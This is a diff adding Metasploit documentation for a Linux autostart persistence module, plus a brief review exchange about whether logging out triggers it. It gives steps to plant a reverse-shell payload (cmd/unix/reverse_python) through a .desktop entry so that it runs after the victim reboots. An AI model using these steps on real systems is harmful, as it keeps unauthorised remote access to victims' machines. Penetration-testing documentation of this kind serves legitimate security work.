documentation/modules/exploit/linux/local/autostart_persistence.md

```diff
@@ -0,0 +1,22 @@
+## Autostart persistence
+
+This module persist a payload by creating a `.desktop` entry for Linux desktop targets.
+
+### Testing
+
+1. Exploit a box
+2. `use exploit/linux/local/autostart_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` (for instance), configure the payload as needed
+5. `exploit`
+
+When the victim reboots your payload will be executed!
```

Comment:
Just reboot, or logout and log back in?

Reply:
Reboot, I think logging out and logging may work, would have to try